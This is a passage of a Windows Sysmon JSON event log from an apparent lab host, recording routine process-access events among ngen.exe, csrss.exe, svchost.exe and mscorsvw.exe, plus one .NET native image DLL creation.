(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.997","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010B5711200}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.997\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010B5711200}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.997","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010B5711200}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.997\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010B5711200}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.997","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010B5711200}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.059\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001061751200}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.059","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001061751200}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001061751200}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001061751200}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001061751200}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001061751200}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:28.418\r\nProcessGuid: {A837DB8D-04FC-5F25-0000-001061751200}\r\nProcessId: 2816\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b00-0\\UIAutomationClient.dll\r\nCreationUtcTime: 2020-08-01 06:00:28.403","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:28.418","ProcessGuid":"{A837DB8D-04FC-5F25-0000-001061751200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b00-0\\UIAutomationClient.dll","CreationUtcTime":"2020-08-01 06:00:28.403","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.450\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001062791200}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.450","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001062791200}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.450\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001062791200}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.450","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001062791200}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-001062791200}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 